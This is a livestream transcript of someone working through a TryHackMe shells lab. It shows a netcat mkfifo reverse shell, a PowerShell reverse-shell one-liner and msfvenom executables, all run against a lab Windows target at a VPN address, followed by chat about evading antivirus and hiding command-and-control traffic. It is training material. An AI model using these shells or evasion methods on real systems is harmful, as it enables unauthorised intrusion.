Yellow, everybody. Hope you guys are doing well. Let me check if you guys can hear me properly. Okay, everything looks fine. Give me a thumbs up if you guys can hear me, right? Like there is no echo or anything like that and stuff. So please give me a thumbs up if everything is good. If not, let me know what it is. And today I have something special. Sorry, yesterday I could not join. Just been busy, like I mentioned in the Discord, right? Like super busy with stuff. But all good. Today I got at least, how to say, 1.5 hours almost to join and get this thing going. So we'll do that and then we'll see. Okay. So today we will be covering a couple of interesting topics. Most importantly, MSF Venom. We are on our What the Hell Shell room by TryHackMe. Let me mention this here. What the hell shell? Introduction to shells, right? So I'm going to mention this and this. So what the shell? And we covered all the SOCAT, NetCat on Monday. And now we will be coming up with common shell payloads. Then we'll be working towards our MSF Venom, which is a Metasploit module, very famous, and also Bendit in his in the podcast I mentioned, right? He created that. And last but not the least, Metasploit multi-handler. So we'll be covering these things, and let's get started with common shell payloads. So we'll soon be looking at generating payloads with MSF Venom. But before we do that, let's take a look at some common payloads using the tools we have already covered. A previous task mentioned that we would be looking at some ways to use NetCat as a listener for a bind shell. So we'll start with that. In some versions of NetCat, including the nc.exe, right, Windows version, included with Kali at this binaries. Yo, Hartfield, I'm doing good, man. How you doing, man? You're always the first one to give me a message. I love you so much for that. Thank you so much for all the messages, all the hearts to you. It makes my day. As soon as I see your message, it makes my day. So thank you so much. How are you doing? Ready to learn some common payloads? You can hear me, right? Okay, yeah. So today we are covering our previous basically common shell payloads, the payloads we will be sending to the target machine to do that. Oh, awesome. Good to hear, buddy. Awesome. So let's cover these ones. These are interesting things, and you might actually find something very useful here. So a previous task mentioned that we would be looking at some ways to use NetCat as a listener for bind shells, right? Because in bind shells, if you remember, here in this NetCat and here, most of the time, if this is the attacker, right, basically us, I have horrible handwriting. I'll go slow. Target. This is target, right? So most of the time we are listening here. But in bind shell, listening is done in the target. So let's see what they want us to do now. So we'll start with that. In some versions of NetCat, including the netcat.exe, which is the Windows application, because if anything is exe, it's Windows, straight up. Windows version included with Kali at user share Windows resources binaries, and the version used in Kali itself, netcat traditional, there is a -e option which allows you to execute a process on connection. For example, as listener, we have netcat nvlp e bin bash, right? Connecting to the above listener with netcat would result in byte shell on the target. Equally, for a reverse shell connecting back, we will have netcat, right? For reverse shell, this one runs inside the target machine. So we are connecting on this port in this and execute these bash or give them a bash, basically. Bash shell would result in reverse shell on the target. However, this is not included in some or most versions of netcat as it is widely seen to be very insecure. Funny that, huh? Why is that funny? I don't get it. On Windows, anybody gets the idea why is that funny? I have no clue what their sense of humor is talking about. On Windows, where a static binary is nearly always required anyway, this technique will work perfectly. On Linux, however, we would instead use this code to create a listener for a bind shell. Okay, wait, on Windows, there is a static binary nearly always required anyway. This technique will work perfectly. Okay, understandable. On Linux, however, instead use this code to create a listener for a bind shell. Okay, mkfifo temporary and -f netcat with the port number. Interesting. Okay, pin bash. That's actually interesting. I had no idea what this one does. mkfifo, let's see what this does. Makes a first in first out special file with name same as the path name made or mode, specifies the FIFO's permission. It is modified by the process unmasked in usual ways the permission to create a file. Basically, a special file is similar to a pipe. Oh, okay, this is similar to a pipe file. Okay, interesting. The following paragraph is the technical explanation of this command. It's slightly above the level of this room, so don't worry, it doesn't make much. If it doesn't make much sense for now, the command itself is what matters. Okay. The command first creates a named pipe. What is a named pipe? Introduction to named pipe. One of the fundamental features that makes Linux and other Unixes useful is the pipe. Pipe allows separate processes to communicate without having been designed explicitly to work together. Basically, this thing you see, the one you use for or is called a pipe. It's useful when, let's say, for example, I do a echo, or let's say I did something, right? Let's say I have a file. There is, and I want to find something in this file. What easy way to do is I will say, okay, I want to print all the things of this file, all the characters inside the file using, let's say, cat and the file. Now, technically, this will be printed, but if I do a pipe and I do grep, right, all this will go inside grep. Grep is about, like, let's say, find or get me this. So it will get you that particular, let's say you are looking for a particular word, let's say hack. That's what it will do for you. So interesting thing actually. And I'll just post this link so you guys can also have a look. Interesting. Okay. The command first creates a named pipe at tf-f. So make mkfifo basically is creating a pipe. It then starts a netcat listener and connects the input of the listener to the output of the named pipe. Okay. Creates a netcat listener, connects the input of the listener to the output of the named pipe. So whatever we put inside this goes as like a like put inside the netcat, goes as an output for this. The output of the netcat listener, oh sorry, output of this. Okay, the netcat listener, i.e. the commands we send, then gets piped directly into the SH. Okay, so this is running at the server, right? Whatever the target machine is. So we put something, it goes as an output, will go inside here. The output of the netcat listener, commands we send, then gets piped directly into the SH, sending the stderr, standard error, output stream into standard out, and sending standard out itself into the input of the named pipe, thus completing the circle. So basically standard output stream goes into the standard out, like our screen or their screen, and standard out goes into the input of the name pipe. So basically it will go inside this file, thus completing the circle. And whatever goes inside the file, if you remember, because of this, inside the file becomes the output of the netcat. So that's actually interesting. mk fee4-f nc this pipe whatever is this into the temporary file, standard error, and then at the end remove this. It's crazy. And this is the whole command, right? From here to this, all the blue section is basically one command. A very similar command can be used to send a netcat reverse shell. Make mk fifo, then no netcat IP port, same thing, netcat. Okay, what is the difference between, okay, there is no listener here. In this one we are listening as soon as it connects. Here we are sending the information. So this one is basically for reverse shell, because if you see listener, this one was bind shell, right? Because listener is here on the right side, if you see, of this file. Listener now is on the left. Here we are sending the netcat IP and port number. When targeting a modern Windows server, it is very common to require a PowerShell reverse shell. So we'll be covering the standard one-liner PSH reverse shell here. So that's PowerShell, I believe, PSH. Search Windows. Oh my posh. Huh? Oh my posh. Just like oh my bash, which is a PowerShell. Oh, this is beautiful. This looks almost sexy. It's crazy. Okay. When targeting a modern Windows server, it's common, very common, basically. One sec. Yeah. It's very common to require PowerShell reverse shell. So we'll be covering standard one-liner PowerShell or OMyPSH, like similar to ZSH and Linux reverse shell here. This command is very convoluted. What does that mean? Complex. So for sake of simplicity, it will not be explained directly here. It is, however, an extremely useful one-liner to keep on hand. PowerShell-C, okay, client new object system, NetSockets TCP. Okay, this is a PowerShell one stream. Holy, I'll get some tea. This is one PowerShell. Oh, honey, client get stream, bytes 0 to 65535. There's ports. I have no idea what this is saying. I'll just. Has anybody got Oh My PSH with you guys, like ever done that? Get string, send back, out string, send back, PowerShell, path, send bytes, basically text encoding ASCII, write, and then flush and close. Okay, interesting. I think I have to learn a lot in life. In order to use this, we need to replace, like, this is one of those type of commands where I feel inferior in life. I don't know if about you guys, so I have to go home. I am in home. I have to just, after this stream, I have to look more into this. In order to use this, we need to replace IP and port with an appropriate IP and choice of port. It can be copied into cmd.exe shell or another method for executing commands on a Windows server, such as web shell, and executed, resulting in a reverse shell. Yeah, okay, so port and IP is mentioned, change here with the appropriate, basically R1. It can be copied into a command.exe shell. Okay, are we mentioning where this is a PowerShell command, right? We are sending. Where is PSH or Oh My PSH mentioned? No. Can be copied into command.exe shell or another method for executing commands on a Windows server, such as web shell. So ISI, I think, or ISS, whichever it is, the internet server, IIS. So Windows server, this will work on that as well. Okay. So basically, if we are listening here and in the Windows, basically we were able to, if we got access to the Windows and we wanted to get a reverse shell, here is your command. And I'll just post it. So if anybody is super curious what's going to happen, all the best. Here and this is the second part. Oh, I can't even put the whole line. One sec. Has to be done like this. Okay. So, you know what? We are going to try this right now. But I want to see how things will work. So, we'll start the Windows machine. An error occurred. Okay. Login. This is not mine. What I'll do is quickly go back here. Okay. Sorry, I'm just going to log into this thing because it has the windows have all the wrong ones and old ones which I don't use or are not there. TryHackMe. Okay. Okay, now I can share my screen back. Okay. Privilege escalation. Have you guys looked into this junior penetration tester one? But I was wondering if anybody would love to cover this with me. I'll send the link here. This is something I would love to do over, let's say, a long weekend, cover majority of it. Okay. So we were here at the bottom, Windows practice, start the shell or start the Windows command. And now I have my Kali ready. So I'll get my ls. Okay. cd desktop sudo openvpn censored hacker collie. Okay, now I have this guy. So now let's see what Windows command they want us to get it done. So we have administrator and TryHackMe. The machine IP is still coming up, but I want to see how easy is that command. And I want to use our good old perplexity to explain me what exactly is going on. Please explain this command in easy words to a university graduate to understand what is going on and yeah, what's going on basically. Okay, till that, because perplexity, it is a research mode, it will take its good amount of time. What I want, where's TryHackMe? Here. Oh, I am tired. Okay, we have our x free rdp server command. For me, I have x free rdp 3, so I'm just going to use that. Hopefully the command is visible to everyone, right? So we got our Windows in here. Alrighty. So what the command we are supposed to run should be in CMD or anywhere, even PowerShell. Let's see with CMD what happens. Okay, take your good enough time. Command prompt, yeah. Okay, I'll change the properties so it's easy to see. Font, I'll go with 36. Way better to see. So the command we are supposed to run is this guy. And change the IP. So for IP and everything, I have to go ifconfig. Where's the tunnel 0, 10, 10, 13, 86, and 9. But I also have to get NC port 444. I think that's all I need, hopefully. So if you see in the second line, I have my IP and port. I have to change that. So IP is what I copied, 10, 13, 86, and then 4444. Okay, let's enter. You got a connection. So let's see. What would be first command? Dir. Okay, yeah. You see Windows administrator, and this is a PowerShell. If you guys see here. Oh, is clear a thing? Okay, clear is gone here. But what I wanted to show you guys is this. The PS means PowerShell. So we have everything here. Now let's see, who am I? Does this work? Windows Shells Administrator. Huh. That's a interestingly neat command, honestly. So I will say get out of it. Right. Now I want to run it in PowerShell. Because that actually was a PowerShell command, but we ran that in CMD with the first line, if you focus, is PowerShell-C and then command. Okay. Oh, won't work. So if you see PowerShell-C, so PowerShell command, just like we do Python-C all the time. So I have to do this with the port number again changed. Four, 10, 13, 86, 9. 10.13.86.9. Ah, connection. This was pretty smooth, honestly. We got our connection and everything. And we have PowerShell. Man, life is interesting. Hacking is very interesting. In order to use this, we need to replace IP and port we did with the appropriate IP and choice of the port. It can be copied into a command exe, basically command prompt, because of the PowerShell-C command. Or another method for executing commands on a Windows server, such as web shell. Basically, if we run it inside the web shell IIS, resulting in a reverse shell to our Linux machine. For other common reverse shell payloads all the things is a repository containing a wide range of shell codes, usually in one-liner format for copy pasting in many different languages. It is languages basically Python and all those stuff, not like English, Mandarin and all those. Because I know somebody did ask, so that's what I'm saying. In many different languages, it is well worth reading through the linked pages to see what's available. So let's go over there. So you see we have tools, reverse shells for AWK. I forgot what is AWK. Scripting language for manipulating data and generating reports. Okay, 1977, 48 years old. Neat. So we have C, bash TCP, bash UDP, Dart, Golang, Groovy, Golang, Java alternative. It's crazy. Just make sure I don't have any messages. Yeah. Lua, NCAT, Netcat, OpenBSD, BusyBox, Meterpreter shell and everything. I love this. I'll drop this link as well for you guys. I never watched that closely how interesting this one is. Okay, so let's move. I think one day we can just go over these and like try to put them in our brain cells, how things work too. One sec. What command can be used to create a named pipe in Linux? So named pipe, remember this was that file which FIFO one, in which whatever you type basically is like a pipe almost. One's input, other's output. So it is make FIFO, first in, first out. There you go. Look through the link payloads, all the things, reverse shell cheat sheet, and familiarize yourself with the languages available. So we'll just do that. And the most interesting I will say with all these ones is my Python one, because at this point, with all the AI things going on, right? Every company is using Python to create their AI toolkit or AI multi-language model or whatever. So that's very important. And it's amazing how many there are. With Python reverse shell, Swiss key repo, IPv6, IPv4, Windows only, Python 2, Windows only. Then there's PHP, everything. Holy, lovely. Hopefully that's helpful, right, for you guys. I have excellent info or no? Okay, things are available. Now we'll go to my favorite session, the one I was excited about, and its creator hangs out in this chat all the time. MSF Venom, the good old bandit. Thanks to him, we have this guy. MSF Venom, the one-stop shop for all things payload related. Part of the Metasploit framework, MSF Venom is used to generate code for primarily reverse and bind shells. It is used extensively in lower level exploit development to generate hexadecimal shellcode when developing something like a buffer overflow exploit. However, it can be used to generate payloads in various formats. Low level exploit development to generate hexadecimal shellcode. So if you know, right, not like the upper level where it is like Java, Python, lower level. Something like buffer overflow exploit. However, it can be used to generate payloads in various formats. Like war file is a Java executable. Like the jar, there is war. Exe executable. ASPX, I think, is it .NET? If I'm not wrong, and Py is Python. Let's see. Yeah, ASP.NET framework. Yeah. Is this latter function that that we will be making use in this room. There is more to teach about MSF Venom that could ever be fit in a single room. Let alone a single task. So the following information will be brief introduction to the concept that will prove useful for this room. The standard syntax for MSF Venom is as follows. MSF Venom, P for payload, and the options. For example, to generate a Windows x64 reverse shell in an executable format, we could use MSF Venom -p Windows x64 shell reverse TCP. Okay, Windows x64 reverse TCP -f format executable -o shell.exe host listening, the one which is R host and R port. Oh wait, L host. That's a different one. That's opposite. Yeah. So specifies the IP to connect back to. When using TryHackMe, this will be our turn 0. So this is R1. It cannot load the link. Then if you cannot load the link, you are not connected to the VPN. So basically, that's it. Yeah. L port, the port for the local machine, the one we are using, where we want. Okay. So you know what? Let's see this. I want to see if I can get this reverse shell. Come on. Exit from here. Exited, right? I have command MSF Venom. Okay, 1 second more. So this will give me the information. This will get me the shell, right? Or executable, I guess. Okay. So we got msfnmp executable output in the shell.exe file. This is creating a file for us to just run in Windows. Oh, my bad. Port will be 4444 and our IP is 10 dot something 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 10.13.86.9. Okay, 10.13.86.9. Let's create. So this should create a shell command for me, or shell executable. You see, shell executable. Now this is what I have to send. So stage versus stageless. Before we go any further, there are two important concepts we must be introduced to: staged reverse shell payloads and stageless reverse shell payloads. Staged payloads are sent in two parts. The first part is called the stager. This is the piece of code which is executed directly on the server itself. It connects back to the waiting listener, but doesn't actually contain any reverse shell code by itself. Instead, it connects to the listener and uses the connection to load the real payload, connecting it directly and preventing it from touching the disk where it could be caught by traditional antivirus solutions. Thus, the payload is split into two parts: a small initial stager, then the bulkier reverse shell code which is downloaded when the stager is activated. Stager payloads requires a special listener, usually Metasploit multi-handler, which we will cover in the next task. Interesting. So basically, to get away from this is how interesting and easy is it. Like, that's how easy it is to get away from antiviruses. So if this is the target, this time my handwriting is good, lads. This time my handwriting is good. It's sexy. Attacker. So in the attacker versus payload, here I get a stager first. Somehow I send this, right? Like through a web request I do it, right? Like whatever. I send a stager. It connects back to me, basically listening. And I send it the shell.exe. Shell.exe should be sent here. And that once run gives me the reverse shell. So hopefully that explains and does the job. But that's for the multi-handler. The next task, we want to know basically the task number 10, if I'm not wrong. Yep, task 10. What we want to know is the stageless one. Stageless payloads are very common. These are what we have been using up until now. Basically where we send it. Chris, what's up? Good morning, bro. How are you doing? How is your day going and how's everything? They are entirely self-contained in that there is one piece of code which when executed sends shell back immediately to the waiting listener. So the one what we are doing is stageless, where we just send the code or the command, right? And it gets us the reverse shell. So basically I will send like whatever the payload is or the PowerShell command we ran. Imagine if we ran that, or if we send it to run, that actually is a whole stageless one, and we get that back. I'm doing good. Yeah, I'm doing good too, brother. Thank you so much for asking. Just had a lot of work recently, and yesterday was crazy busy, and still today is. I have meetings, and I just had such a bad neck looking at the screen. My days are going almost like 13 hours, almost 13, 14 hours. Working on some stuff. But soon, that's the reason I could not join yesterday. Sorry about that. But once this issue is fixed, I promise like over the weekend, we'll go for a super big long stream. Do you guys have a TryHackMe subscription? Let me ask you that. Do you have that? Oh, also one thing I'll do, 1 second. Hopefully this is better. Nope. Okay. And would you like to I want to ask you this. There are a couple of things I want to do with you guys. I'll quickly go over that as well because we covered Stagelet, what it is. So there is one thing called over the wire. Oh, you read this room from the Medium, nice. So there is over the wire bandit game. This is about Linux. There are a lot of free games. Basically, these are hacking games, just like what we are doing right now. We have bandit, a bunch of them, right? Either we can do this over the weekend because I want to make up to you guys. I didn't do one yesterday, so I will be doing one on Sunday, my Sunday, so your guys Sunday night, right? Either we can do this. These are war games. Here I'll post the link. Let me know if you like these things. There is this one. There is TryHackMe penetration testing, PT Junior Pen Tester. TryHackMe. There is this certification they launched recently. We can cover this, a lot of this part. And last but not the least, we can cover one hub. Basically, TryHackMe stuff, but it will be on your own computer, and you hack your by yourself. You don't need any subscription. You download, you set it up, and you do it by yourself. So I want to know one thing from you guys: which one of these things you guys would like to do? Right? I'm going to put a poll here as well as in the Discord. I want to see what you guys think. I don't know. Can I do a poll? Oh, I should be able to do a poll. Sunday special. Basically, over the wire, or you want one hub or TryHackMe pen tester cert. Which one do you guys want? Let me know. And even on Twitch, I will start this. Over the wire, and then we have one hub. Please let me know. This will help me, right? Do things the way you guys want me to do. So it will be very helpful. So, do you guys understand what what are the things there, right? You at least understand what I'm talking about. And over the wire will be a Linux things. TryHackMe will be a full-on hacking stuff we will do. And then, one hub again hacking, but it will be amazing too. So whichever you want, Sunday special. I will come up early, so around my 9 a.m. So that will be like your guys 9:30 p.m. right? Hopefully that's okay. and we'll cover 3-4 hours, or I can come at night and your morning, whichever you guys like prefer. You can tell me the time as well. I'll change according to you guys. So yeah, that's my way to make up to you guys, I guess. That's how I can make up to you guys. Okay, so let's go back to stageless payloads. Stageless payloads are very common. We did this, covered this. So let's cover here. Stageless payloads tend to be easier to use and catch. However, they are also bulkier and are easier for antivirus or intrusion detection programs, like we were talking last time, to discover and remove. Stage payloads are harder to use, but the initial stager is a lot shorter and sometimes missed by less effective antivirus softwares. Modern day antivirus solutions will also make use of anti-malware scan interface AMSI to detect payload as it is loaded into memory by stager, making stage payloads less effective than it would be once has been in this area. Okay, so basically anti-malware scan interface, they are looking into your memory. So just to help you guys understand what they are talking about, right? Let's say we have this big one. Okay, so let's say this is your resources, right? Resources pool. In your computer, right? Basically your PC. So in resources, one of the big things is your storage. A lot of time what happens is code is in your storage, right? So what antivirus softwares do, go through all the files inside your storage, inside your disk, right? Your hard drive, your SSD, whatever, to scan them and see if there is anything wrong. What this anti-malware interface does, there is another resource called your RAM. And this is what's called memory. Remember, there's storage and there's memory. A lot of people make this mistake. These two are different. Storage and memory are different in computer. So here, this is loaded, and this is as soon as you turn off your computer, right? Basically, you turn off the power of your computer. This random access memory, this memory here, which has files and things running, all is gone. And once you restart, starts from refresh. Whereas storage or SSD, just like you're storing your games, all those things that still remain, right? Now, what happens? There are, and why this is what the stageless or staged payloads do is like they will load your virus or your payload here in this. Your payload basically is in this. As the antivirus is only scanning here, they don't get cat, but anti-malware scanning interface, I think AMSI, this is scanning here. So two different things. Interestingly, I want to show, I don't know if you guys know Snowden, the guy who basically hacked the whole, is a whistleblower, hacked NSA, right? Big guy. One of the softwares he loves to use is called Tails OS. Beautiful thing about Tails OS, you always need a USB. If you see this image, that's a USB. That's a USB. Why it's a USB? Because the only time this software, this thing works is because you need to have the whole operating system within your USB disk or USB, right? You load it in, turn on the computer, and let's say the whole computer is basically starting from zero. No storage is there, nothing is there, no files are stored. As soon as you take off, let's say FBI comes inside your room or somebody who comes inside your room, take off the USB, whole memory, everything. Nobody can know what you were doing. So the thing with that, you have to remember all your passwords. So just wanted to go over like why and why that happens, because your operating system, right? All the information, like a Windows type 1, all the information is stored in the storage area. let me do one thing. All the information of, let's say, a software like Windows is stored here, but a Tails one is stored here. That's the difference between these two type of operating system. This one is in RAM, this one is in storage. Tails one will be gone. As soon as you turn off your computer, gone. All the information gone. So hopefully that was helpful, right? Some interesting thing to play with. And let's go with Metapreter. On the subject of Metasploit, another important thing to discuss is a Metapreter shell. Metapreter shells are Metasploit's own brand of fully featured shell. They're completely stable, making them a very good thing when working with Windows Target. They also have a lot of inbuilt functionality of their own, such as file uploads, downloads. If we want to use any Metasploit's post-exploitation tools, then we need to use a Metapreter shell. However, that is a topic for another time. The downside of Metapreter shells is that they must be caught in Metasploit. Interesting. So basically, caught in Metasploit is basically, if you want to get the reverse shell, you have to do it using Metapreter. You have to do it through Metasploit framework. That's all it means. Payload naming convention. So hopefully this understands, right? Like for you guys, there is MSF Venom that creates the shell, basically exe, and that will connect back, and we can actually see. I thought they will be doing that for us, showing us how to do it, but that's fine. I think I will show you then if they don't. So we got our shell.exe, right? What I will do is, let's say I want to start a HTTP server, Python 3 HTTP server. My server is here, and I want to get a wget file. So I'll go with PowerShell. So we have PowerShell, right? I just want to know the wget command for PowerShell. So I can have the PowerShell with the out file, okay, like this. So wget, I think this was 10.13.86. This is my IP for this system, right? Then I will go 8080 slash home, or what is this, desktop actually. So desktop shell.exe, and then I will go out file shell.exe. Error response for not found. Okay. Home Kali. Okay, it got something. Not found. Is it just shell.exe because it's running here? Okay, so what I did here, let me hide my face for a second. So what I did, because I think I ran the Python file inside the desktop, so that becomes my root. I did wget my IP over the OpenVPN tunnel 1, right? Tunnel 0, and then 8080 port shell.exe out file. Now I can stop my HTTP server on the system, and I just need to start my netcat listening port, right? And what I will do is shell.exe. Okay, what is it? Oh, okay. Maybe I have to go through. Doesn't work like that. It's not Linux. So, where you at, bro? This PC, local user, administrator, shell.exe. You see here, as soon as I ran this command, I got the shell. So now I can do, let's say, oh, that won't work. Dir. No? What's going on? Why it's not working? Okay. It's connecting easily. Dir. No. Why it's not working? Hold up. So if I have directory, do I have to do it through cmd? Okay, let me put it here. Okay, what if I do through command prompt or dir actually? Cd desktop dir shell.exe. Should do something. It connects very fast. Okay. Is it just waiting? Yeah, it's probably waiting for it to connect all the time. Okay, what I can do is, does anybody know what might be the issue? I'm, I think, not able to get the right one. If I get to task manager here, Amazon blah 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 shell.exe. Damn, using a lot of memory. End task or CPU I meant. End task. Okay, on the left we can see that ended. Okay, so I'll run this again with here. Did the job. Let's see. Dir. No. Why no? Shell.exe it's running, but it's not doing the job I want. What it could be. Is it because it has to be from the Metasploit itself? Even MSF Venom? Okay, so we were here. Part of Metasploit framework, MSF Venom is to generate code for primarily reverse and bind shells. It is used extensively in lower level exploits development to generate hexadecimal shell code when developing blah blah blah. It's this latter function that will be making use of this room. There is more to teach about MSF Venom that would ever be fit in a single room, let alone in a single task. So the following information is a brief introduction to the concept that will prove useful for this room. Standard syntax is basically payload and options. We did that, right? x64 shell reverse TCP, executable shell.exe, our port and IP, which is working fine. So maybe what I can do is quickly go to TryHackMe MSF Venom or Metasploit. Give me Metasploit training. Okay, this is the Metasploit module which I was supposed to cover earlier. MSF Venom, right? We have MSF Venom payloads are there. Output formats. This is handlers. To exploits using reverse shell, we'll need to be able to accept incoming connection generated by MSF Venom payload. When using an exploit module, this part is automatically handled by the exploit module. You will remember how to use payload options. Title appeared when setting a reverse shell. The term commonly used to receive a connection from target is called catching a shell. Reverse shells or metapreter callbacks generated by MSF Venom can be easily caught using a handler. Okay, the following scenario may be familiar. We will exploit the file upload vulnerability present in vulnerable web application. For exercise in this task, we'll need to replicate a similar scenario on another target system. Okay, so generate shellcode. Handler. Okay, it has to be a Metasploit handler. So we cat this. Should be edited and converted into a reverse PHP. Blah blah blah. Use exploit multi-handler. Okay, that's the reason. I think that's what we need to do. So we do MSF console. So that starts our Metasploit. Don't forget to vote, lads. That'll be very helpful to me to understand what you guys would like me to do next. Use, what was the command? Exploit multi-handler. Okay. Show options, I guess. Port is 44, lhost. Okay. So now let's run this. Okay, lhost is set lhost 10.13.86.9 if I'm not wrong. Yep. Lhost is this. Run. Okay. Okay, we got our shell. Or dir. Command shell session 1 closed. Session 2 closed as well. And we crashed the Windows. Awesome. Hey, crashing is also considered as hack. Okay, let's see. Dude, cancel. Okay. Set this, set payload, set the payload as well. Show options, run, handler. Okay, so maybe in the next stage we will have that because they are going to talk about MSF multi-handler. Okay, all good. Let's move forward as we have less time today. So payload naming conventions. When working with MSF Venom, it's important to understand how the naming system works. The basic convention is as follows: operating system, architecture, basically x84, x86 or x64, and then the payload type. For example, we have Linux, x64, shell reverse TCP. This would generate a stageless reverse shell for x86 Linux target. The exception to this convention is Windows 32-bit targets. For these, the architecture is not specified. Interesting. So it will be basically Windows shell reverse TCP. And I will share my beautiful face in a second here. Okay. You guys can see me, right? I forgot to start doing that. For 64-bit Windows target, the architecture would be specified as normal x64. Let's break the payload session down a little further. Okay. In the above example, the payload used was shell reverse TCP. This indicates that it was a stageless payload. How? Because of the underscores. Stageless payloads are denoted with underscores. The stage 1 equivalent are based on backslash or forward slash. So shell reverse TCP as stage payloads are denoted by the forward slash. We read this actually when we were doing the Metasploit. The rule also applies to Metapredator payloads. A Windows 64-bit stage Metapredator payload will look like this. Windows x64 Metapredator reverse TCP. Okay. Basically, this is a Metapredator and reverse, so basically a stageless payload. x64 a Linux 36-bit stageless Metapredator payload would look like Linux x86. Why x86? 64-bit. It should be 86-bit, right? Not 32-bit. Metapredator reverse TCP. Oh, wait. Oh, because here, between Metapredator and reverse shell, not about like the whole thing. Okay. Got it. Aside from the MSF console man page, the other important thing to note when working with MSF Venom is MSF Venom list payloads. This can be used to list all available payloads, which can then be piped into grep to search for a specific set of payloads. For example, list of all available payloads. So MSF Venom list payloads grep Linux x64 Metapredator. So we get like bind. These are all staged ones. So bind IPv6 TCP bind. Okay, all these. Find tag reverse TCP HTTP. Okay. And inject stage. This is stageless. Okay. This gives us a full set full set of Linux Metapredator payloads for 32-bit targets. I don't get it. Why it's saying 32 when it's like 32-bit. I'm not the best with these things. So x86 started with a 16-bit instruction set for 16-bit processors. The 8086 and 8084 processor when extended to 32-bit instructions. Okay. Architecture, bits, different things. My bad. And now can be extended to 64-bit instruction set with 64-bit processors. So 32-bit instructions is x86 architecture. 32-bit processors capable of running 86 instruction sets. Okay. Hola, Bandit, what's up? Yo, we needed you today. I needed actually a quick, so everyone who don't know, MSF Venom is this guy's creation. This guy is the OG, right? Do give him a follow. His Twitter is also Bandit, but with a 0 at the end. Bandit, quick question for you. And I know first thing you are going to say is Tmux, so yes. I should have downloaded it, too busy. Even like, I have a meeting in 6 minutes starting. So I want to complete this task as at least. What I want to know, right, is this like Metasploit. I created this shell one. Yes, where is Tmux? Yes, I know. I have to just download it at this point. I just started, like, you can see, I'm just too much going on. Once the application starts working on the server back, life will be good. Sudo apt install Tmux done. I know. Let's do that. I should have done this before. So sudo apt install tmux kali. Okay, but this is done. But let's look at this. I have shell.exe, right? I created using MSF Venom. Where is this? MSF Venom -p Windows x64 reverse TCP, right? Format executable shell.exe. I change my oh, here it is. This is my host and port, right? When I try to run this in with the Windows one, in the Windows I did like shell.exe. I just clicked that and then I went to command prompt also and ran shell.exe. I get like the shell back, but I'm not able to run ls or dir. I even tried with the Metasploit, but this is what's happening. What am I doing wrong? Yeah, ls, not ls, but what about dir? Dir is one, right? What is it? Because like if I do one ls and that does that break everything? Do I have to disable Defender? I thought like there isn't anything going on. Let's see. So if I have this, I'll go back here. Okay, we got here, right? And one more thing I wanted to confirm. Okay, sounds good. So everybody, as Benjit said, Defender, right? And then let's but if your connection should drop. Yeah, yeah, let's see. So here, and one thing I want to confirm. So if I have I've created with MSF Venom, I have to do exploit multi-handler, all those things, right? So, and here's the show options, probably first thing. This is the good old information. And let's run shell.exe. If I do this, netcat, I did that too. Like if I do, that's what I was thinking. So I did that too. I was doing this netcat nvlp. For Metapredator, you will use it, right? We don't need Metapredator. Okay, I did this. Got my stuff. Dir doesn't do anything. So I'm just wondering what's going on here. So what is going wrong? What's HRM? What is HRM? So we can try multi-listener. Okay. So let's exit this guy or cancel this. Okay. Oh, okay, got it. I didn't type that use. Did I type that? Use. Am I hacked? I don't know. So use multi. What is the handler? Okay, handler. Use multi handler. So we have this show options. Okay, set payload. Okay. Generic shell reverse TCP. The same one the the exe is using. Okay. Windows X. Payloads. So I will say use or set payload. This. Okay, payload is set to this. L host I have to set up, I guess. Set L port. L port is good. I think 4444, right? No need to set L port. I think all this are there. Okay, so now just run, I guess. Run. Sending stage to this guy. Okay. Oh, thanks, boss. Thank you so much. Is this okay? So during the staged payloads, I have to set up the payload properly, and that's it. That was the only mistake. The listener has to send the second stage. Yeah, got it. If it was stageless, then I don't have to, right? Then I think I was doing good. Then it would be like basically using netcat. I don't think even Metasploit is required in that case. Stageless, yes, just NC listener. Got it. Sweet. Thank you so much, man. You saved my day. I was just so confused. What's going on? Okay. Alrighty. So a big thanks to Bandit, right? Everybody, give him a big thank you. That'll be very. I like it when if somebody is like these, unless it's Metapreter, because the Metapreter uses a custom protocol. It uses its own protocol, like HTTP, and then there is Metapreter protocol. That's interesting. Metapreter protocol. Attack payload that provides. Oh, okay. I had no idea. It uses its own protocol. I thought it was using the same things we all do. Okay. So if it uses its own protocol, isn't it easy to detect? Or is it just hides itself under HTTP and HTTPS communication? Interesting. Interesting stuff. Good to know things. Good to know things. It hides under encrypted channels. Yeah, basically like HTTPS and all those types. So with encryption, it doesn't. Okay. Oh, okay. Okay. So like, now let me ask you this question. So if I'm a hacker, I'm given basically a assignment to hack someone or get a reverse shell somewhere. How would I do it? Like if I can't use Metasploit, how would I do it? How should I do it? Or rather, that's a good question. Okay, if the network does a SSL inspection. Okay. Okay. So like how would you do it then? Like if my question would be then how would you do it? If everything like I'm learning right now is detectable, what? Oh, I would use something else. Okay, like actually paid type of stuff. Okay, I see. It's interesting. Actually, I wanted to whenever we think of Cobalt Strike, the first thing that reminds me of our C2 server. Oh, build my own. Oh, okay. How hard it is to build my own protocol then? Has anyone built their own protocol? Like, have you built your own protocol? Like, and how does that work? Like, the other computer or other system you're trying to hack also needs to learn that, right? You're not building TCP, you're building on top of it. Oh, okay. Got it. I see. Interesting. And give me 1 sec. I have to look into one thing. What's going on? Okay. But the design. So, do you have any? Okay, I think this is like another whole big session, right? To learn how to build a protocol on top of it. Oh, okay. So you want like something that is easy to like use for others. It's like more like a plug-in type thing, right? Plug-in process, or it's like something versatile. I think that's the word. It's a versatile because like if I want to use it for web shells, if I want to use it for other stuff, then that is it. That is, you want to use it over a side channel like Twitter and Google Docs. Oh, okay, just like there was a so this something like this you are talking about. So I think it was Lizardrus group or Kimsky. Okay, I thought it was Lizardrus. So they used basically so anyone who doesn't know, they used basically Metasploit framework. Oh, sorry, not Metasploit. My bad. They used Facebook Messenger to give commands and connections to, or like basic commands to the system. 1 second. You could wrap your protocol in steganography even and use an image service as oh wow. Have you done that, like hiding your protocol inside a image? Have you done that before or ever? That's actually crazy. Like, I want to try these things. It wouldn't be any different. Oh, okay. Interesting. Sorry, I'm just looking at one thing on the side. I got like a message, personal message. So I'm just looking on that on the side. Interesting. Okay. That's good to know. So I think that's something to work on for future, I guess. And I have to like, it's funny because I was mentioned like I have to continue on my Metasploit, like complete my Metasploit module as well. I forgot to do that after our session. Okay. Give me 1 second. I'll play a quick, no, I'll be here. Give me 1 second. I'm just need something to work around. I just need to make sure something is working. But I have to reply to this guy. It's a work call I got, so I was supposed to be a meeting right now, but that's fine, I guess. Hold up, everybody. I'm so sorry. Give me like 1 minute and I should be good. Okay, 